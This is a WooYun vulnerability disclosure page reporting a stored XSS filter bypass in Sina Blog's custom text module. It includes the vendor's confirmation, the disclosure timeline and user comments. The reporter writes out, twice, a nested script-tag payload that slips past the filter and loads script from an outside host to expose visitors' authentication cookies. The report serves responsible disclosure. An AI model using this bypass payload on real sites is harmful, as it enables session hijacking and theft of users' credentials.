当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050003

漏洞标题:新浪博客存储型XSS漏洞(xss filter bypass)

相关厂商:新浪

漏洞作者: q601333824

提交时间:2014-01-29 10:04

修复时间:2014-03-15 10:04

公开时间:2014-03-15 10:04

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-29: 细节已通知厂商并且等待厂商处理中
2014-01-29: 厂商已经确认,细节仅向厂商公开
2014-02-08: 细节向核心白帽子及相关领域专家公开
2014-02-18: 细节向普通白帽子公开
2014-02-28: 细节向实习白帽子公开
2014-03-15: 细节向公众公开

简要描述:

新浪博客存储型XSS漏洞,,可劫持用户身份认证信息。

详细说明:

1.花了一中午,终于绕过去了,XSS存在的位置在:设置模块---管理自定义模块---自定义文本模块
2.选中显示源码,插入代码:(这样插入可以绕过过滤)
s<script src="">r<script src="">i<script src="//q601333824.duapp.com">
如图:

QQ截图20140128140254.png


3.代码存在的未知,如图:

QQ截图20140128140953.png


4.弹出认证信息COOK

QQ截图20140128140919.png


5.自己做的总结就是
这样插入,过滤了字母s,r,i之间的恶意标签,但是i之后的标签就没有过滤了,自己的猜测,检查的时候只循环了两次,这样插入第三个第三标签没循环到。
s<script src="">r<script src="">i<script src="//q601333824.duapp.com">
6.只要浏览过我博客的人都会触发XSS

漏洞证明:

1.选中显示源码,插入代码:
s<script src="">r<script src="">i<script src="//q601333824.duapp.com">
2.

QQ截图20140128140254.png


3.

QQ截图20140128140953.png


4.

QQ截图20140128140919.png



修复方案:

建议就是多循环检查几次

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-01-29 17:52

厂商回复:

感谢关注新浪安全,祝洞主新年快乐,万事如意!~~~

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-29 18:11 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    - 求提前预报~

  2. 2014-01-29 19:37 | 夏殇 ( 路人 | Rank:30 漏洞数:21 | 不忘初心,方得始终。)

    新浪XSS啊,求细节

  3. 2014-01-30 01:08 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    都新年快乐....=_=

  4. 2014-02-18 17:57 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    聪明的小男孩

  5. 2014-02-19 20:46 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    @LaiX 运气好碰到了,大概是把标签过滤了变成//后面的被屏蔽了,只能想到这么多